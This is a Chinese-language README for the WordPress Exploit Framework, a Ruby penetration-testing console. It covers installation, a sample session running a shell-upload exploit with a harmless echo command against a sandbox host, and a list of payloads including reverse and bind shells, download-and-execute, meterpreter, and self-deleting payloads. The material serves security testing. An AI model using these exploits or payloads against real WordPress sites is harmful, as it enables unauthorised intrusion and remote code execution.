一個Ruby框架,旨在幫助WordPress系統的滲透測試。
安裝
要安裝最新的穩定版本,請運行gem install wpxf。
gem install wpxf
安裝後,您可以通過運行wpxf啟動WordPress利用框架控制台。
wpxf
我需要什麼來運行它?
運行WordPress漏洞攻擊框架需要Ruby>=2.4.4。
安裝故障排除
Debian系統
如果您在安裝WPXF的依賴項(特別是Nokogiri)時遇到問題,請首先確保您擁有編譯C擴展所需的所有工具:
sudo apt-get install build-essential patch
您的系統上可能沒有安裝重要的開發標頭檔。如果你遇到這種情況,你應該做以下幾點:
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev libsqlite3-dev
Windows系統
如果遇到訓示無法加載libcurl.dll的錯誤,則需要確保最新的libcurl二進位檔案包含在Ruby bin資料夾或環境的PATH變數中的任何其他資料夾中。
libcurl.dll
最新版本可從http://curl.haxx.se/download.html下載。截至2016年5月16日,最新版本標記為Win32 2000/XP zip 7.40.0 libcurl SSL。下載存檔檔案後,將bin目錄的內容選取到Ruby bin目錄中(如果出現提示,請不要覆蓋任何現有的dll)。
Win32 2000/XP zip 7.40.0 libcurl SSL
我怎麼用?
通過運行wpxf啟動WordPress利用框架控制台。
wpxf
加載後,將顯示wpxf提示,從這裡可以使用search命令蒐索模塊或使用use命令加載模塊。
search
use
將模塊加載到您的環境中將允許您使用set命令設定選項,並使用info查看有關模塊的資訊。
set
info
下麵是一個示例,說明如何加載Symmission_shell_upload exploit模塊,設定模塊和負載選項,並針對目標運行攻擊。
wpxf > use exploit/shell/symposium_shell_upload
[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>
wpxf [exploit/shell/symposium_shell_upload] > set host wp-sandbox
[+] Set host => wp-sandbox
wpxf [exploit/shell/symposium_shell_upload] > set target_uri /wordpress/
[+] Set target_uri => /wordpress/
wpxf [exploit/shell/symposium_shell_upload] > set payload exec
[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>
wpxf [exploit/shell/symposium_shell_upload] > set cmd echo "Hello, world!"
[+] Set cmd => echo "Hello, world!"
wpxf [exploit/shell/symposium_shell_upload] > run
[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully
有關受支持命令的完整清單,請查看此Wiki頁面。
輔助模塊和利用模塊有什麼區別?
輔助模塊不允許您在目標電腦上運行有效負載,而是允許您從目標電腦中選取資訊、提升許可權或提供拒絕服務功能。
利用漏洞模塊要求您指定一個負載,該負載隨後在目標電腦上執行,允許您運行任意程式碼從電腦中選取資訊、建立遠程shell或在web服務器上下文中執行任何其他操作。
有哪些有效載荷?
- bind_php:上傳將綁定到特定埠的腳本,並允許WPXF建立遠程shell。
- 自定義:上傳並執行自定義PHP腳本。
- 下載執行:下載並運行遠程可執行文件。
- meterpreter_bind_tcp:使用msfvenom生成的meterpreter bind tcp負載。
- meterpreter_reverse_tcp:使用msfvenom生成的meterpreter reverse tcp負載。
- exec:在遠程服務器上運行shell命令,並將輸出返回到WPXF會話。
- reverse_tcp:上載將建立反向tcp shell的腳本。
除custom和Meterpreter有效負載外,所有這些有效負載在執行後都將删除它們自己,以避免在使用後或在使用它們建立shell失敗時將它們留在目標電腦上。
custom
如何編寫自己的模塊和有效負載?
有關編寫模塊和有效負載的指南可以在Wiki上找到,API的完整檔案可以在https://rastating.github.io/wordpress-exploit-framework上找到
許可證
版權所有(C)2015-2018 rastating
未經雙方同意對網站運行WordPress漏洞攻擊框架在您的國家可能是非法的。作者和參與開發的各方不承擔任何責任,也不對WordPress利用框架造成的任何誤用或損壞負責。
此程式是自由軟體:您可以根據自由軟體基金會發佈的GNU通用公共許可證(許可證的第3版或(由您選擇)任何更高版本)的條款重新分發和/或修改它。
這個程式的發佈是希望它會有用,但沒有任何保證;甚至沒有對適銷性或特定用途的適用性的暗示保證。有關更多詳細資訊,請參見GNU通用公共許可證。
您應該已經收到一份GNU通用公共許可證的副本和這個程式。如果沒有,請參閱http://www.gnu.org/licenses/。